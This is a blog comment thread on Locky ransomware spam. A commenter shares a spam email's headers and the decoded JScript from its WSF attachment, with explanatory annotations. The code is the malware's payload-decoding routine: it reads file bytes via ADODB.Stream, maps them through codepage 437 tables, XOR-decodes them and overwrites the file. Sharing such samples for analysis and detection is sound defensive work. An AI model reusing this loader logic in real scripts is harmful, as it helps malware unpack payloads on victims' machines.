Comments

attached is the paycheck for your next months salary in advance malspam delivers Locky — 2 Comments

  1. We’re getting

    Received: from hp-PC (unknown [197.129.92.8])
    From: "Alice" <Alice66999@>
    To:
    Date: Tue, 30 Aug 2016 23:07:54 +0100
    Subject: FW: [Scan] 2016-08-13 14:21:31
    Date: Tue, 30 Aug 2016 23:07:54 +0100

    with a zipped WSF file attached.
    The WSF file contains base64-encoded content which unravels to:

    // Reads `filePath` through an ADODB.Stream opened as a text stream (type 2 =
    // adTypeText) with Charset 437 (the OEM/DOS code page), then hands the resulting
    // string to alkotesterzercerLOBIKfsta, which maps it back to an array of byte
    // values. Bytes 0x00-0x7F come through unchanged and the tables below cover
    // 0x80-0xFF, so this is a way to load a file's raw bytes via a text stream.
    // The `function` keyword appears to have been lost when the sample was pasted,
    // and the straight-quoted twin in alkotesterzercerLOBIKsatt below suggests the
    // curly quotes on the next lines are a blog rendering artifact, not the sample's.
    alkotesterzercerLOBIKrtfta(filePath)
    {
    var alkotesterzercerUIIHHAAArosteks=new ActiveXObject(“ADODB.Stream”);
    alkotesterzercerUIIHHAAArosteks[“type”]=2;
    alkotesterzercerUIIHHAAArosteks[“Charset”]=437;
    alkotesterzercerUIIHHAAArosteks[“open”]();
    alkotesterzercerUIIHHAAArosteks[“LoadFromFile”](filePath);
    // ReadText is referenced without call parentheses, unlike the other members;
    // whether the JScript/COM binding still invokes it is not shown by this excerpt.
    var fileString=alkotesterzercerUIIHHAAArosteks[“ReadText”];
    alkotesterzercerUIIHHAAArosteks[“close”]();
    return alkotesterzercerLOBIKfsta(fileString);
    };
    // Converts a string produced by a Charset-437 text read back into byte values.
    // Code points below 128 are kept as-is; every other code point is looked up in
    // t1, which maps the Unicode characters of CP437's upper half back to bytes
    // 0x80-0xFF. A code point that is not in t1 yields `undefined` in the result
    // (sparse-array lookup), so the input is expected to be exactly CP437-decodable.
    // Returns an array of numbers, one per input character.
    function alkotesterzercerLOBIKfsta(fileString)
    {
    // t1: Unicode code point -> CP437 byte, for the 128 values 0x80..0xFF.
    var t1=new Array();

    t1[0xC7]=0x80;t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;t1[0xE0]=0x85;t1[0xE5]=0x86;t1[0xE7]=0x87;t1[0xEA]=0x88;t1[0xEB]=0x89;t1[0xE8]=0x8A;t1[0xEF]=0x8B;t1[0xEE]=0x8C;t1[0xEC]=0x8D;t1[0xC4]=0x8E;t1[0xC5]=0x8F;t1[0xC9]=0x90;t1[0xE6]=0x91;t1[0xC6]=0x92;t1[0xF4]=0x93;t1[0xF6]=0x94;t1[0xF2]=0x95;t1[0xFB]=0x96;t1[0xF9]=0x97;t1[0xFF]=0x98;t1[0xD6]=0x99;t1[0xDC]=0x9A;t1[0xA2]=0x9B;t1[0xA3]=0x9C;t1[0xA5]=0x9D;t1[0x20A7]=0x9E;t1[0x192]=0x9F;t1[0xE1]=0xA0;t1[0xED]=0xA1;t1[0xF3]=0xA2;t1[0xFA]=0xA3;t1[0xF1]=0xA4;t1[0xD1]=0xA5;t1[0xAA]=0xA6;t1[0xBA]=0xA7;t1[0xBF]=0xA8;t1[0x2310]=0xA9;t1[0xAC]=0xAA;t1[0xBD]=0xAB;t1[0xBC]=0xAC;t1[0xA1]=0xAD;t1[0xAB]=0xAE;t1[0xBB]=0xAF;t1[0x2591]=0xB0;t1[0x2592]=0xB1;t1[0x2593]=0xB2;t1[0x2502]=0xB3;t1[0x2524]=0xB4;t1[0x2561]=0xB5;t1[0x2562]=0xB6;t1[0x2556]=0xB7;t1[0x2555]=0xB8;t1[0x2563]=0xB9;t1[0x2551]=0xBA;t1[0x2557]=0xBB;t1[0x255D]=0xBC;t1[0x255C]=0xBD;t1[0x255B]=0xBE;t1[0x2510]=0xBF;t1[0x2514]=0xC0;t1[0x2534]=0xC1;t1[0x252C]=0xC2;t1[0x251C]=0xC3;
    t1[0x2500]=0xC4;t1[0x253C]=0xC5;t1[0x255E]=0xC6;t1[0x255F]=0xC7;t1[0x255A]=0xC8;t1[0x2554]=0xC9;t1[0x2569]=0xCA;t1[0x2566]=0xCB;t1[0x2560]=0xCC;t1[0x2550]=0xCD;t1[0x256C]=0xCE;t1[0x2567]=0xCF;t1[0x2568]=0xD0;t1[0x2564]=0xD1;t1[0x2565]=0xD2;t1[0x2559]=0xD3;t1[0x2558]=0xD4;t1[0x2552]=0xD5;t1[0x2553]=0xD6;t1[0x256B]=0xD7;t1[0x256A]=0xD8;t1[0x2518]=0xD9;t1[0x250C]=0xDA;t1[0x2588]=0xDB;t1[0x2584]=0xDC;t1[0x258C]=0xDD;t1[0x2590]=0xDE;t1[0x2580]=0xDF;t1[0x3B1]=0xE0;t1[0xDF]=0xE1;t1[0x393]=0xE2;t1[0x3C0]=0xE3;t1[0x3A3]=0xE4;t1[0x3C3]=0xE5;t1[0xB5]=0xE6;t1[0x3C4]=0xE7;t1[0x3A6]=0xE8;t1[0x398]=0xE9;t1[0x3A9]=0xEA;t1[0x3B4]=0xEB;
    t1[0x221E]=0xEC;t1[0x3C6]=0xED;t1[0x3B5]=0xEE;t1[0x2229]=0xEF;t1[0x2261]=0xF0;t1[0xB1]=0xF1;t1[0x2265]=0xF2;t1[0x2264]=0xF3;t1[0x2320]=0xF4;t1[0x2321]=0xF5;t1[0xF7]=0xF6;t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

    var resultArray=new Array();
    // Bracket-string member access (fileString["length"], ["charCodeAt"], ["push"])
    // is the sample's obfuscation style; it is equivalent to plain dot access.
    for (var Tj=0; Tj < fileString["length"]; Tj++)
    {
    var OVc9=fileString["charCodeAt"](Tj);
    if (OVc9 < 128)
    {var HIi3=OVc9;}
    else
    {var HIi3=t1[OVc9];}
    resultArray["push"](HIi3);
    };

    return resultArray /* y */;
    };
    // Inverse of alkotesterzercerLOBIKfsta: turns an array of byte values back into
    // the string that a Charset-437 text stream will serialise to those same bytes.
    // Values below 128 are used directly as code points; 0x80-0xFF go through t2.
    // Returns the characters joined into one string.
    function alkotesterzercerLOBIKfats(codeArray)
    {
    // t2: CP437 byte (0x80..0xFF) -> Unicode code point; the exact inverse of t1.
    // The entry `t2[0xFC]=0x2` / `07F` is split across two lines by the blog's line
    // wrapping; t1 above has t1[0x207F]=0xFC, so the intended value is 0x207F.
    var t2=new Array();

    t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89]=0x00EB;t2[0x8A]=0x00E8;t2[0x8B]=0x00EF;t2[0x8C]=0x00EE;t2[0x8D]=0x00EC;t2[0x8E]=0x00C4;t2[0x8F]=0x00C5;t2[0x90]=0x00C9;t2[0x91]=0x00E6;t2[0x92]=0x00C6;t2[0x93]=0x00F4;t2[0x94]=0x00F6;t2[0x95]=0x00F2;t2[0x96]=0x00FB;t2[0x97]=0x00F9;t2[0x98]=0x00FF;t2[0x99]=0x00D6;t2[0x9A]=0x00DC;t2[0x9B]=0x00A2;t2[0x9C]=0x00A3;t2[0x9D]=0x00A5;t2[0x9E]=0x20A7;t2[0x9F]=0x0192;t2[0xA0]=0x00E1;t2[0xA1]=0x00ED;t2[0xA2]=0x00F3;t2[0xA3]=0x00FA;t2[0xA4]=0x00F1;t2[0xA5]=0x00D1;t2[0xA6]=0x00AA;t2[0xA7]=0x00BA;t2[0xA8]=0x00BF;t2[0xA9]=0x2310;t2[0xAA]=0x00AC;t2[0xAB]=0x00BD;t2[0xAC]=0x00BC;t2[0xAD]=0x00A1;t2[0xAE]=0x00AB;t2[0xAF]=0x00BB;t2[0xB0]=0x2591;t2[0xB1]=0x2592;t2[0xB2]=0x2593;t2[0xB3]=0x2502;t2[0xB4]=0x2524;t2[0xB5]=0x2561;t2[0xB6]=0x2562;t2[0xB7]=0x2556;t2[0xB8]=0x2555;t2[0xB9]=0x2563;t2[0xBA]=0x2551;t2[0xBB]=0x2557;t2[0xBC]=0x255D;t2[0xBD]=0x255C;t2[0xBE]=0x255B;t2[0xBF]=0x2510;t2[0xC0]=0x2514;t2[0xC1]=0x2534;t2[0xC2]=0x252C;t2[0xC3]=0x251C;t2[0xC4]=0x2500;t2[0xC5]=0x253C;t2[0xC6]=0x255E;t2[0xC7]=0x255F;t2[0xC8]=0x255A;t2[0xC9]=0x2554;t2[0xCA]=0x2569;t2[0xCB]=0x2566;t2[0xCC]=0x2560;t2[0xCD]=0x2550;t2[0xCE]=0x256C;t2[0xCF]=0x2567;t2[0xD0]=0x2568;t2[0xD1]=0x2564;t2[0xD2]=0x2565;t2[0xD3]=0x2559;t2[0xD4]=0x2558;t2[0xD5]=0x2552;t2[0xD6]=0x2553;t2[0xD7]=0x256B;t2[0xD8]=0x256A;t2[0xD9]=0x2518;t2[0xDA]=0x250C;t2[0xDB]=0x2588;t2[0xDC]=0x2584;t2[0xDD]=0x258C;t2[0xDE]=0x2590;t2[0xDF]=0x2580;t2[0xE0]=0x03B1;t2[0xE1]=0x00DF;t2[0xE2]=0x0393;t2[0xE3]=0x03C0;t2[0xE4]=0x03A3;t2[0xE5]=0x03C3;t2[0xE6]=0x00B5;t2[0xE7]=0x03C4;t2[0xE8]=0x03A6;t2[0xE9]=0x0398;t2[0xEA]=0x03A9;t2[0xEB]=0x03B4;t2[0xEC]=0x221E;t2[0xED]=0x03C6;t2[0xEE]=0x03B5;t2[0xEF]=0x2229;t2[0xF0]=0x2261;t2[0xF1]=0x00B1;t2[0xF2]=0x2265;t2[0xF3]=0x2264;t2[0xF4]=0x2320;t2[0xF5]=0x2321;t2[0xF6]=0x00F7;t2[0xF7]=0x2248;t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x2
07F;t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;

    var EGj=new Array();
    var resultString="";
    var HIi3; var OVc9;
    for (var Tj=0; Tj < codeArray["length"]; Tj++)
    {
    HIi3=codeArray[Tj];
    if (HIi3 < 128)
    {OVc9=HIi3;}
    else
    {OVc9=t2[HIi3];}
    EGj.push(String["fromCharCode"](OVc9));
    }

    // Characters are collected in an array and joined once rather than
    // concatenated in the loop.
    resultString=EGj["join"]("");

    return resultString;
    };
    // Counterpart of alkotesterzercerLOBIKrtfta: converts `codeArray` (byte values)
    // to a CP437 string with alkotesterzercerLOBIKfats and writes it to `filePath`
    // through an ADODB.Stream text stream with Charset 437, so the bytes land in the
    // file unchanged. SaveToFile's second argument 2 is adSaveCreateOverWrite: an
    // existing file at `filePath` is replaced. Nothing is returned.
    function alkotesterzercerLOBIKsatt(filePath, codeArray)
    {
    var alkotesterzercerUIIHHAAArosteks=new ActiveXObject("ADODB.Stream");
    alkotesterzercerUIIHHAAArosteks["type"]=2;
    alkotesterzercerUIIHHAAArosteks["Charset"]=437;
    alkotesterzercerUIIHHAAArosteks["open"]();
    alkotesterzercerUIIHHAAArosteks["writeText"](alkotesterzercerLOBIKfats(codeArray));
    alkotesterzercerUIIHHAAArosteks["SaveToFile"](filePath, 2);
    alkotesterzercerUIIHHAAArosteks["close"]();
    };

    // XORs every element of the array in place with a repeating key,
    // alkotesterzercerTRAxKey, which is defined outside this excerpt, and returns
    // the same (mutated) array. Together with the read/write helpers above this is
    // the sample's payload de-obfuscation step: file -> byte array -> XOR -> file.
    // Detection note: an ADODB.Stream read with Charset 437, a CP437 lookup table
    // and a modulo-keyed XOR loop appearing together in a script attachment is a
    // distinctive pattern for content-based mail or script inspection rules.
    function alkotesterzercerLOBIKxdac(alkotesterzercerLOBIKcca)
    {
    for (var Tj=0; Tj < alkotesterzercerLOBIKcca["length"]; Tj++)
    {
    // Math.floor is redundant: Tj % length is already an integer.
    alkotesterzercerLOBIKcca[Tj] ^= alkotesterzercerTRAxKey[Math.floor(Tj % alkotesterzercerTRAxKey.length)];
    }
    return alkotesterzercerLOBIKcca;
    };

    I have not decoded the Unicode/ASCII yet.
    I have posted this to Pastebin and sent the WSF to Kaspersky.
